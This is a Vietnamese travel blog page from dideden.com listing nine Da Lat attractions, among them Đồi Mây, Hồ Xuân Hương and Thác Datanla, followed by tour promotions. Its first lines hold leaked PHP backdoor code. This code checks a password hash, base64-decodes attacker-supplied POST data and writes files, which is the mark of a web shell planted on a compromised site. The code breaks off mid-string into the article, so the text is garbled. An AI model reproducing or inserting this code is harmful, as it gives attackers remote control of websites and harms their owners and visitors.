function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Top 9+ địa điểm du lịch Đà Lạt 2023 hấp dẫn không nên bỏ lỡ

Top 9+ địa điểm du lịch Đà Lạt 2023 hấp dẫn không nên bỏ lỡ

31/01/2023 VNBK Admin

Địa điểm du lịch Đà Lạt 2023 là một trong những từ khóa có lượt tìm kiếm nhiều nhất trong năm. Nhắc đến Đà Lạt, ai ai cũng trầm trồ trước những khung cảnh hữu tình, nên thơ của thành phố ngàn hoa. Đặc biệt, thành phố này còn sở hữu khí hậu mát mẻ, thời tiết hơi se lạnh rất thuận lợi cho việc đi du lịch. Chính vì thế, nơi đây luôn là sự lựa chọn lý tưởng cho du khách trong và ngoài nước. Hãy cùng dideden.com điểm qua 9+ địa điểm du lịch Đà Lạt đẹp đến nao lòng. 

1. KHU DU LỊCH ĐỒI MÂY 

Đồi Mây là một trong những địa điểm du lịch Đà Lạt 2023 được các tín đồ săn mây yêu thích. Khu du lịch được thiết kế theo mô hình du lịch cộng đồng, có diện tích lên đến 1,5ha. Khi đến đây, bạn sẽ được chiêm ngưỡng cảnh núi non hùng vĩ và có cơ hội ngắm nhìn mây trôi giữa lòng thung lũng. Bên cạnh đó, nơi đây còn sở hữu cảnh sắc tuyệt của cánh đồng hoa mênh mông. Đến với khu du lịch Đồi Mây bạn sẽ được chiêm ngưỡng trọn vẹn cảnh đẹp như xứ sở thần tiên. 

Không chỉ có cảnh đẹp, khi du lịch tại Đồi Mây du khách còn có hội được trải nghiệm nhiều hoạt động thú vị như: tham gia các hoạt động ngoài trời, teambuilding, đón bình minh, cắm trại,… Đặc biệt, bạn còn có cơ hội thưởng thức những món nướng thơm ngon bên bếp lửa trại trong không khí se lạnh của Đà Lạt. Chắc chắn, nơi đây sẽ là địa điểm du lịch Đà Lạt 2023 để lại cho bạn những trải nghiệm tuyệt vời, khó quên. 

địa điểm du lịch Đà Lạt 2023 - Khu du lịch Đồi Mây

Địa điểm yêu thích của các tín đồ săn mây. 

2. ĐỊA ĐIỂM DU LỊCH ĐÀ LẠT 2023 – HỒ XUÂN HƯƠNG 

Hồ Xuân Hương là một địa điểm du lịch Đà Lạt 2023 quá đỗi quen thuộc với du khách trong và ngoài nước. Nằm ngay khu vực trung tâm thành phố, nơi đây còn được mệnh danh là viên ngọc xanh của thành phố ngàn hoa. Khi đến đây, bạn có thể tha hồ tận hưởng khung cảnh thơ mộng, yên bình giữa mặt hồ trong vắt. 

Ngoài ra, Hồ Xuân Hương còn được mệnh danh là địa điểm hẹn hò vô cùng lý tưởng cho các cặp đôi đang yêu nhau. Chính vì thế, khi đến đây cũng người yêu, bạn đừng quên trải nghiệm đạp vịt quanh hồ. Nếu không, hai bạn có thể đi bộ dạo quanh hồ cũng lãng mạn không kém. Còn gì tuyệt vời hơn khi hai người yêu nhau, dạo quanh bờ hồ đón những làn gió mát, ngắm nhìn dòng nước trong vắt nhẹ nhàng trôi đúng không nhỉ?

địa điểm du lịch Đà Lạt 2023 - Hồ Xuân Hương

Hồ Xuân Hương – viên ngọc xanh giữa lòng thành phố ngàn hoa.

Xem thêm >>> Lý do bạn nên gác lại mọi thứ, xách balo đi du lịch Đà Lạt dịp cuối năm

3. HỒ TUYỀN LÂM 

Hồ Tuyền Lâm – khu dịch sinh thái nổi tiếng không thể bỏ qua khi chọn địa điểm du lịch Đà Lạt 2023. Tuyền Lâm là một hồ nước nằm ở vùng ngoại ô Đà Lạt, cách trung tâm thành phố 7km. Khi đến đây, bạn sẽ được hòa mình vào thiên nhiên hùng vĩ bằng nhiều trò chơi thú vị khác nhau. Du ngoạn thuyền, chèo thuyền Kayak là hai trò chơi được khách du lịch lựa chọn nhiều nhất. Ngoài ra, bạn cũng có thể cùng bạn bè, người thân đi dạo trên cầu vào buổi chiều để ngắm hoàng hôn, ngắm cảnh thiên nhiên, núi rừng bao la. 

địa điểm du lịch Đà Lạt 2023 - Hồ Tuyền Lâm

Hồ Tuyền Lâm – địa điểm thích hợp để ngắm hoàng hôn.

4. QUẢNG TRƯỜNG LÂM VIÊN 

Quảng trường Lâm Viên – địa điểm du lịch Đà Lạt 2023 giúp bạn có nhiều bức ảnh sống ảo. Nơi đây sở hữu biểu tượng bông hoa dã quỳ khổng lồ đại diện cho thành phố ngàn hoa. Ngoài ra, quảng trường còn có diện tích rộng lớn, thoáng đãng, mát mẻ nên được giới trẻ tụ tập vui chơi. Đặc biệt vào ban đêm có các dịch vụ thuê xe, giày trượt patin vô cùng nhộn nhịp, sôi động. Ban ngày, bạn nên đi với bạn bè đến đây thưởng thức ẩm thực đường phố như: xiên nướng, bánh tráng nướng,… uống một ly cà phê nóng chắc chắn sẽ để lại cảm xúc rất khó quên. 

địa điểm du lịch Đà Lạt 2023 - Quảng trường Lâm Viên

Quảng trường Lâm Viên – biểu tượng bông hoa dã quỳ khổng lồ đại diện cho thành phố.

Xem thêm >>> Điểm danh 4 homestay ở Đà Lạt đẹp và dễ thương 

5. ĐỊA ĐIỂM DU LỊCH ĐÀ LẠT 2023 – CỔNG TRỜI BALI

Cổng trời Bali Đà Lạt là một trong những địa điểm du lịch Đà Lạt 2023 được yêu thích nhất. Đặc biệt các bạn trẻ muốn có những bức ảnh sống ảo ngàn like thì không nên bỏ qua địa điểm trên. Cổng trời được lấy cảm hứng từ nước Indonesia nên như một phiên bản thu nhỏ của Cổng trời Bali. Tại đây bạn có thể ngắm nhìn khung cảnh đồi núi, thiên nhiên từ trên cao. Không dừng lại ở đó, khu vực Cổng trời còn có rất nhiều quán cà phê cực chất như: hồ trên mây, tổ chim, nấc thang lên thiên đường,… giúp bạn có hàng ngàn bức ảnh sống ảo. 

địa điểm du lịch Đà Lạt 2023 - Cổng trời Bali

Phiên bản thu nhỏ của Cổng trời Bali.

6. THÁC DATANLA 

Thác Datanla là một ngọn thác lớn trong khu du lịch Datanla, cũng chính là địa điểm du lịch Đà Lạt 2023 bạn không nên bỏ qua. Thác mang một vẻ đẹp hoang sơ, bình dị nhưng cũng không kém phần thơ mộng, lãng mạn. Khi đặt chân đến đây, du khách sẽ được chiêm ngưỡng vẻ đẹp của dòng nước trong vắt, hiền hòa chảy qua các vách đá. Nhẹ nhàng là thế nhưng khi đổ xuống ghềnh cao hơn 20m dòng nước trở nên dữ dội hơn bao giờ hết. Về phía cuối chân thác, dòng nước trả lại sự ầm ầm dữ dội mà thay vào đó là sự êm ả, dịu dàng như suối tiên. 

Bên cạnh đó, thác Datanla còn chiêu đãi du khách với hàng ngàn trò chơi mạo hiểm như: đu dây vượt thác, đu dây băng rừng, đi trượt xe,… Tất cả sẽ mang lại cho bạn một trải nghiệm tuyệt vời, khó quên.

địa điểm du lịch Đà Lạt 2023 - Thác Datanla

Thác Datanla còn chiêu đãi du khách với hàng ngàn trò chơi mạo hiểm.

Xem thêm >>> Điểm danh ngay TOP 30 các điểm du lịch Đà Lạt cực kỳ hấp dẫn 

7. NHÀ THỜ CON GÀ

Nhà thờ Con Gà là một công trình kiến trúc được xây dựng vô cùng quy mô, hoành tráng. Nơi đây được thiết kế theo theo phong cách kiến trúc cổ điển nhưng lại có nhiều màu sắc nên vô cùng tươi vui. Từng chi tiết bên trong, ngoài đều được làm một cách tỉ mỉ, chăm chút. Vừa đặt chân đến nơi này, bạn có thể cảm nhận được ngay nét đặc trưng của Đà Lạt và Thiên Chúa giáo. 

Phía trên cùng ngọn thánh giá có hình con già được làm bằng kim loại. Khi phóng tầm mắt ra xa có thể ngắm nhìn được toàn cảnh thành phố mộng mơ đầy lãng mạn, trữ tình. Chính vì thế, đây được xem là địa điểm du lịch Đà Lạt 2023 không nên bỏ qua khi là bạn một tín đồ sống ảo. 

địa điểm du lịch Đà Lạt 2023 - Nhà thờ Con Gà

Nhà thờ Con Gà – địa điểm du lịch Đà Lạt 2023 bạn không nên bỏ qua.

8. LÀNG HOA VẠN THÀNH

Đà Lạt còn được nhiều người biết đến với cái tên thành phố ngàn hoa. Nơi đây có thổ nhưỡng, khí hậu thuận lợi cho nhiều loài hoa đua nhau khoe sắc. Nhờ vậy, khi nhắc đến địa điểm du lịch Đà Lạt 2023 nhiều người nghĩ ngay đến những vườn hoa bát ngát. Làng hoa Vạn Thành là một trong những làng hoa lớn, lâu đời nhất tại Đà Lạt. Khi ghé chân đến đây bạn như lạc vào thiên đường của muôn vàn loài hoa. Hương thơm dịu nhẹ, kết hợp cùng sắc màu rực rỡ của những bông hoa tạo nên khung cảnh vô cùng nên thơ, lãng mạn. 

3 tháng cuối năm là thời điểm thích hợp nhất để ghé thăm làng hoa. Bởi vì, lúc này hoa nở rộ, đẹp nhất trong năm. Chỉ với 40.000 VNĐ, du khách tha hồ check-in sống ảo và có hàng trăm bức ảnh đẹp mang về. Còn chần chờ gì nữa, khoác ngay lên mình những bộ cánh thật lộng lẫy ghé làng hoa Vạn Thành ngay hôm nay bạn nhé!

địa điểm du lịch Đà Lạt 2023 - Làng hoa Vạn Thành

Làng hoa Vạn Thành – một trong những làng hoa lớn, lâu đời nhất tại Đà Lạt.

9. TIỆM CÀ PHÊ TÚI MƠ TO

Tiệm cà phê là một địa điểm du lịch Đà Lạt 2023 được nhiều người săn đón, đặc biệt là các bạn trẻ. Trong đó, Túi Mơ To là quán cà phê được check-in nhiều nhất khi du lịch Đà Lạt. Quán sở hữu không gian ngoài trời rộng rãi, nhìn phía xa là đỉnh Langbiang và thung lũng. Phía trước là cây hồng mọc nghiêng, độ vào tháng 11 trái hồng chín, tỏa ra hương thơm ngào ngạt. 

Túi Mơ To còn nổi tiếng với những bông hoa cúc họa mi được xuất hiện ở khắp các ngóc ngách của quán. Những cánh hoa trắng tinh kết hợp cùng nhụy vàng và hương thơm nhè nhẹ làm khung cảnh thơ mộng. Khu vực dưới đồi còn có cả một vườn hoa cúc nhiều màu đầy sặc sỡ, lấp lánh. Tất cả khu vực trong quán đều được xếp sẵn ghế gỗ để mọi người có thể check-in mọi lúc, mọi nơi. 

địa điểm du lịch Đà Lạt 2023 - Tiệm cà phê Túi Mơ To

Tiệm cà phê Túi Mơ To – quán cà phê được check-in nhiều nhất khi du lịch Đà Lạt.

Xem thêm >>> Hướng dẫn chi tiết tour Sài Gòn Đà Lạt 4 ngày 3 đêm

Trên đây là tổng hợp 9+ địa điểm du lịch Đà Lạt 2023 đẹp nhất Đi Để Đến muốn gửi đến bạn. Hy vọng rằng với những thông tin hữu ích trên bạn sẽ có được chuyến du lịch thật ý nghĩa tại thành phố sương mù. Nếu bạn có nhu cầu đặt tour Đà Lạt 3 ngày 3 đêm hãy liên hệ đến hotline 1900 3398 và đừng quên theo dõi dideden.com để đọc được nhiều bài viết thú vị hơn nhé!

ĐĂNG KÍ ĐẶT TOUR DU LỊCH ĐÀ LẠT
  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]